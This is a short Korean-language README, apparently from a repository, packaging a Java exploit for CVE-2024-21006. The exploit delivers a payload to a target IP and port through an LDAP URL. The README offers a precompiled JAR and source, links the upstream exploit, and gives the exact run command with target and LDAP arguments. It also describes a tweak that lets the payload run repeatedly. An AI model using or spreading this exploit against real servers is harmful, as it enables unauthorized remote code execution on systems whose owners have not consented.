
Java 기반 CVE-2024-21006 익스플로잇으로, LDAP를 통해 대상 IP 및 포트에 페이로드를 전달합니다. 커스터마이징을 위한 컴파일된 JAR 및 소스 코드가 포함되어 있습니다.
exp 코드 참조: https://github.com/momika233/CVE-2024-21006
여기서는 소스 코드를 jar 패키지로 컴파일하여 사용하기 편리하게 했습니다. lib 아래는 의존성 파일이며, 소스 코드를 수정하고 싶다면 직접 컴파일하면 됩니다.
java -jar CVE-2024-21006.jar <ip> <port> <ldapUrl>


dadvlingd 님의 프로젝트를 참고하여 bind에 무작위 문자열을 사용해 payload를 한 번만 실행할 수 있는 문제를 해결했습니다.
https://blog.csdn.net/zwy15288408160/article/details/138189146